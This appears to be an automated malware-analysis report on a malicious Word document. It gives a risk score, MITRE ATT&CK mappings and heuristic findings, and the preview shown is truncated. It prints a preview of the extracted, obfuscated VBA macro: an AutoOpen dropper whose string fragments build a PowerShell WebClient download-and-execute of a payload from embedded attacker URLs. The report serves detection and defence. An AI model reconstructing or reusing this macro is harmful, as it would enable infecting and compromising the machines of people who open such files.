MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro that utilizes the AutoOpen function, a common technique for automatic execution upon opening the document. The macro employs the Shell() function to download and execute a payload from a suspicious URL. The reconstructed URL from the script is "http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs/,http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs", which is included as an IOC. The presence of the Shell() call and the obfuscated URL strongly indicate a downloader or droppper functionality.
Heuristics 6
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 174,708 bytes but its declared streams total only 24,487 bytes — 150,221 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88974 bytes |
SHA-256: ba6770ba6c7819602dde8c55421ec25e9ccb98ccc917353d7bc5070ac8fbd538 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sNPLAJluI"
Function EBbQYTqvXqz()
ZZuoTzUiKsP = Array(StrReverse("dDnKZODmABkTBK"), StrReverse("ScHNEaK"), StrReverse("wZzDWhFOOU"), StrReverse("UUcrRXYSadqbVX"), StrReverse("wROPpYSio"), StrReverse("cLhFunVzHqhp"), StrReverse("pqfHkrHwbfDj"), StrReverse("zwfVBlnGoMqNf"))
JRODYW = Mid("0dwd5JP1n85sjfiZEzNHO)(((g0Y &((ge'+'T-VARIabLE hs2*mDR*hs2'+').nAME[3g0Y+g0Y,11,'+'2]-JOi'+'nhs2hs2)((h'+'s2HBhs2+g0Y+g0Yhs2Efhs2+hs2rg0Y+g0Yhs2+hs2anhs2+hs2c ='+' new-hs2+hs2objehs2+hs2ct System.Nhs2+hs2etE5r", 22, 186)
zwqZjdn = Array(StrReverse("USUAKLjmCVMRcw"), StrReverse("cjwYEUnXMbch"), StrReverse("mWqbRCbSqtwY"), StrReverse("cZiODMftAt"), StrReverse("AlbhvIZiiwzj"), StrReverse("lAZUUmqwzkr"), StrReverse("tzXPBrmcF"), StrReverse("fauXiUQuVdt"))
FEkbuWT = Array(StrReverse("UbOhkIjZZJRir"), StrReverse("lBfdVGoXUlow"), StrReverse("fAdouEB"), StrReverse("XNzTbHaZVETu"), StrReverse("UnjNrZBz"), StrReverse("ctoGBYvV"), StrReverse("iptOoiKuwN"), StrReverse("zhVBuKNzbCiApP"))
CpIwb = Array(StrReverse("XkIzvoBfish"), StrReverse("vumsOhXjJEGs"), StrReverse("GAIEmjSVk"), StrReverse("sHuSIlkzcG"), StrReverse("svuhljIQ"), StrReverse("SdQipotbsM"), StrReverse("OLXtlTPPw"), StrReverse("FdmFNFNWBw"))
wiwRrqCTMzE = Mid("jtuaY+g0Y2+hs2'+'tp://wwwhs2+hsg0Y+g0Y2.loza.zp.ua/'+'R/,http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys8qkARVOPiPEXirprocYYcAwOs", 5, 108)
fjosHj = Array(StrReverse("EiUGBdzhoENF"), StrReverse("wCzanAIuXmLqLz"), StrReverse("UzpEzDdfZsLTzA"), StrReverse("whFNzYEEMoH"), StrReverse("jrJPqfFMpPIGv"), StrReverse("XYhbjJurqd"), StrReverse("zwVQudPsNznP"), StrReverse("VntoqhZzRfA"))
zHAZXIlFF = Array(StrReverse("EOEOrMdT"), StrReverse("IHQrvhYBwRUsS"), StrReverse("NAdcbjfEqPEKwS"), StrReverse("tHlvFQwNvKj"), StrReverse("MajcRlRrONj"), StrReverse("kNEQAml"), StrReverse("GVCJizMhPmiR"), StrReverse("CSdHnmYfaQjXiK"))
PiFiUNBKXQi = Array(StrReverse("kHZSjHiqBt"), StrReverse("luhEmzf"), StrReverse("WiPzhZzjN"), StrReverse("jHTVhdmcmt"), StrReverse("WcUiQzU"), StrReverse("biWBJosVKrs"), StrReverse("aUWRmiPMDRKK"), StrReverse("NABuPRbdElpN"))
DzaZsRs = Mid("K3EB7zvEsaPJpUiwlhs2ite-hosg0Y+g0Yt HBE_.hs2+h'+'s2Excehs2+hs2pths2+hs2ion.Messahzd4DiWjURvPpqUD", 18, 63)
DSwmnHBVwt = Array(StrReverse("LiMIZwZqYZtUZ"), StrReverse("bbiSIiuaIMAN"), StrReverse("fFVmAnU"), StrReverse("hZaswcbEhu"), StrReverse("wvzoBFacz"), StrReverse("ZAHMqulDntjE"), StrReverse("uCEZKFTVb"), StrReverse("iOJjQTjZL"))
VsACbsFksE = Array(StrReverse("JhpIckt"), StrReverse("cCGCwihH"), StrReverse("KULPworaua"), StrReverse("EWijEfYiW"), StrReverse("paRakwusTitVib"), StrReverse("CrNtzihJcG"), StrReverse("TawQJzl"), StrReverse("UuuoMqwibrW"))
lAHjXLTDWvi = Array(StrReverse("QtYqvsuZLF"), StrReverse("sDqtzASzFWvE"), StrReverse("wmmIlbiTiK"), StrReverse("wAVmGiA"), StrReverse("HvImzjoE"), StrReverse("iRBVozuJGlokX"), StrReverse("OsnvzfjtX"), StrReverse("lzdnAoczWo"))
sukiYSjsqv = Mid("3nbrG9fjkb8Ofv3OvLhs2g0Y+g0Y'+'+hs2ghs2+hs2e;}}hs2)'+'g0'+'Y+g0Y.repLAcE(hs2LYjhs'+'2,h1ufMzNQwqh", 19, 69)
vTkBYV = Array(StrReverse("sGKCoLoZMHQo"), StrReverse("iiUuDYukzH"), StrReverse("HCBDAzGRFXN"), StrReverse("PwbwLLSN"), StrReverse("GUhLcoXSczs"), StrReverse("jumKlYMBwiwQRE"), StrReverse("baiYhtzBiTrYLi"), StrReverse("cZVMjBpoZnFLiX"))
VARrwOQcO = Array(StrReverse("MJhJAbdAzMZjd"), StrReverse("tJloZNlujjqWGI"), StrReverse("JrNidBjGl"), StrReverse("DCtaILOAsHfrIw"), StrReverse("DSczSdUUjoV"), StrReverse("AzsKCzpV"), StrReverse("sUXXcWNB"), StrReverse("RiQHajGJTVii"))
fqOwmdrd = Array(StrReverse("vWLaOQBAlUhiAf"), StrReverse("CZTczQQSrYIu"), StrReverse("dHzjiioXCMh"), StrReverse("DDYDUcCZ"), StrReverse("JvwITcfETCF"), StrReverse("YXiXzzRqKz"), StrReverse("lWvNrOXwF"), StrReverse("zTLwbOFJSi"))
LsAhKNp = Mid("PDill7M0:hs2+hs2//www.xhs2+hs2n-hs2'+'+hs2-bg0Y+g0Y1hs2+hs2aedg0Y
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.